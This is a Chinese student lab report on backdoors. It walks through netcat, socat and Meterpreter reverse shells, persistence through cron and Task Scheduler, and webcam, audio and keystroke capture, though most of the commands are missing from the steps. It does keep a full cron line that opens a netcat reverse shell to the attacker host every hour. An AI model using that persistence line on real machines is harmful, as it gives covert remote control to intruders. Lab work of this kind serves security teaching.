2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165215
目录
实验内容1、使用netcat获取主机操作Shell,cron启动 2、使用Socat获取主机操作Shell,任务计划启动 3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 基础问题回答
常用后门工具NetcatNetcat是一个底层工具,进行基本的TCP UDP数据收发,主要用于调试领域、传输领域甚至黑客攻击领域。 windows 获取 linux 的shell1、在Windows下使用ipconfig查看本机IP为 2、使用ncat.exe程序监听本机的5215端口 3、在Kali环境下,使用 4、成功获得Kali的shell,可运行任何指令,如 linux 获取 winsdows 的shell1、在Kali环境中使用ifconfig查看IP为 2、使用nc指令监听5215端口 3、在Windows下,使用 4、Kali下可以看到Windows的命令提示 使用nc传输数据1、Windows下使用 2、kali使用 3、连接建立成功,双方可以相互传输数据 使用nc传文件1、Windows下监听5215端口,并把收到的数据保存到5215.txt中,ncat.exe -l 5215 > 5215.txt 2、kali使用 3、连接建立成功,Win可以收到kali发来的文件 Socat
MSFmeterpreter
实验内容任务一:使用netcat获取主机操作Shell,cron启动这里将wwindows作为攻击机,kali作为被攻击机 1、Windows中使用 2、在Kali中,使用 3、在底行插入43 * * * * /bin/netcat 192.168.1.239 5215 -e /bin/sh(意为在每个小时的第43分钟反向连接Windows的5215端口) 4、 5、在系统时间到第43分时,windows获得kali shell 任务二:使用socat获取主机操作Shell,任务计划启动1、在Wiondws中搜索任务计划程序,在弹出的窗口右侧选择 2、填写任务名称 3、选择 4、在列表中右键选中刚刚创建的任务,点击运行 5、在kali中输入 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell1、在kali中输入指令 2、在Windows中使用 3、kali中输入 4、在kali中新打开一个终端,使用 5、输入 6、输入 7、输入 8、输入 9、输入 10、输入 11、在windows端运行后门程序 12、此时kali获得Windows主机的连接,并且得到了远程控制的shell 任务四:使用meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权重复任务三的操作直至 1、使用 2、使用 3、使用 4、使用 5、使用 实验过程中遇到的问题
实验总结与体会这次的实验内容很有趣,使我们对后门的了解更加深入,也更深切地体会到netcat、socat和MSFmeterpreter等后门工具的强大。懂得攻击方法后,在平常使用中,可以很好地提高我们的防范意识,比如我早就机智地将摄像头贴上了小图标~ (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- 如何在Windows 7中使用cmd使用cURL发布XML数据?
- windows server 2012 r2 搭建企业文件共享存储
- active-directory – 如何禁用域上除内置管理员以外的所有管
- windows-runtime – 什么时候应该在C/C++X中使用ref类?
- 在Windows上的Visual Studio代码中调试C#代码
- 在Windows 10中连接到VPN
- 在.NET DLL中存储连接字符串的最佳方式是什么?
- Windows 7中的windows-7 – makecert.exe丢失,如何获取并使
- windows-8 – 如何在Windows 8 Store HTML / JS应用程序中检
- windows – 如何学习WinDbg? (回复:看似简单的挂起过程)
- windows-server-2003 – 错误“当前没有可用于登
- Windows安装程序 – 启动条件以检测Office 2010应
- Windows认证为基于Java的Web应用程序,如何?
- windows-server-2012 – 基于访问的枚举和遍历文
- active-directory – 我正在设置内部AD Windows
- cn_windows_7_ultimate_with_sp1_x64_dvd_u_6774
- user-interface – Win32:在高DPI下的对话框中显
- 是否值得在不同版本的Windows上测试相同版本的IE
- windows – GnuTLS:无法使用GIT_SSH_COMMAND获取
- windows-server-2012 – 有没有办法同时更改多台